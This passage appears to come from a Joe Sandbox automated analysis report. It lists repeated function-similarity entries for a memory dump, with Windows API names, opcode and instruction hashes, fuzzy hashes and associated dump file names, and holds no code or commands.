                                                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0e172d7ea5e890d92c6a2989d53da8e3c55f614dc17c23923d45aaf4937351c2
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 00a90f2f27808d6977451649309aa814f140187412205e08aa985f9244d9b426
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e172d7ea5e890d92c6a2989d53da8e3c55f614dc17c23923d45aaf4937351c2
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50F0AF33A2868187F7A08F60F4887AA73A0BF85764F041336D66D826D4DF7CD019EA04
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: $
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-227171996
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f5e1524899c56bc23ad3890ea476fd64461aaca1c1c6cf088a54164d3a5803aa
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: b6a6271e53e474a5f6754065862a0e2d74387e16425838c5c0ca95bf4472bbd0
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5e1524899c56bc23ad3890ea476fd64461aaca1c1c6cf088a54164d3a5803aa
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5BE1B83390865241EB688E19905037D33A0FF46B44F14A275DA4E877A5EF3BD853F74A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: e+000$gfff
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-3030954782
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fc16f48a51adf8395f54aceaf0b9db76d004ae62db191d73de727a3be8067e6d
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c0e27d5c2a274c321404876ec5fbf7d2aebcb1f1bc43e821029566fdba30a6da
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc16f48a51adf8395f54aceaf0b9db76d004ae62db191d73de727a3be8067e6d
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7517923B282C546E7248E36D8007697791F756B94F08E231CFA8C7AC5EF3ED4469706
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1010374628-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6014164824e8a34c6f2219c4f96c4cac5d351884ed5a121efd756264cce15c2b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ffad34e9c3ebacc5ed179a652c326daad8f6fba8fb03cd994b3fc5bd55532c85
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6014164824e8a34c6f2219c4f96c4cac5d351884ed5a121efd756264cce15c2b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5802B123E0D65740FBA1AB1594013B93291AF07B91F44A639DD6DC73D2EE3FA403A30A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID: gfffffff
                                                                                                                                                                                                                                                                                                                                  • API String ID: 0-1523873471
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 24567b7b7ad9cc25883cfe86a0af8cdb31fb8148e1153fa934f37376d4be2ae6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0c041de77c85ae567ec22807eab6fe178dfb2d374206e953ac534fd9044fe864
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24567b7b7ad9cc25883cfe86a0af8cdb31fb8148e1153fa934f37376d4be2ae6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41A15963B187C586EB21CF2990007A97B90EB56B84F44E131DE8D87785EE3EE407E706
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                                                  • String ID: TMP
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 47ea1f6def5f518426b9f240e4a0d08a7fd0549338a13be3274c745da13762ef
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3734e1949d8578ac32af34b13c975a043e9fb1324e5a67663e21ed69406dc9a7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47ea1f6def5f518426b9f240e4a0d08a7fd0549338a13be3274c745da13762ef
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2851B817F0924241FB649726950177A7292AF4ABC4F44E435DE0DC7795FE3EE407E20A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2f1302fce1481fbe20b13d751b936209868e95a9271a4e16dc4ced5aa84efd4b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 684d84ece3c063c1b1c7b878329d40d147ba96cca205fe25470a78474eb8ea56
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f1302fce1481fbe20b13d751b936209868e95a9271a4e16dc4ced5aa84efd4b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5B09221E17A02C2EB482B22AC8231433A57F4A7A0F982139C10CA0320DF3D20AA6B06
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 740f364038b0a02b74aefc6a4002d605bb8d66e8ece03474d19f7dcd3f76f926
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3101e2266b89e1e1f063488c270169038ce06260bf7ca30a2f8c5d56b844f544
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 740f364038b0a02b74aefc6a4002d605bb8d66e8ece03474d19f7dcd3f76f926
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82D1C927A0864685FB688E25A44037D37A0EF46788F14A275CE4DC7695EF3AD843F34A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 41c2dd31deb4208f6a64af358637e949a31ffee90b73308347fda93b72d461a0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fb92c3ad0933ff7306df52f0730fd9e85f96773106a5fc351fb7745d73cec14d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41c2dd31deb4208f6a64af358637e949a31ffee90b73308347fda93b72d461a0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7AC1A2732141E08BE2C9EB29E46987EB391F78D30DB94503BEB8747B89CA3CA415D751
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 081855a1139a905c050f004adae9c343e6fe2e6a907cc23c5706cce6c129a0ff
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f36a17b14601eb323a8ec55747cf1f98cea72aeb1f29bbb063d06c84ba9ddcef
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 081855a1139a905c050f004adae9c343e6fe2e6a907cc23c5706cce6c129a0ff
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4B15E7790878585E7648F29D05033C3BA0E74AB48F24A175CB4E87395EF3AD442F70A
                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000008.00000002.4118984545.00007FF6E1B31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6E1B30000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4118707378.00007FF6E1B30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119241171.00007FF6E1B5A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B6D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119451353.00007FF6E1B7C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B7E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1B94000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BBE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BC7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BCB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000008.00000002.4119842854.00007FF6E1BD5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff6e1b30000_A19A.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID:
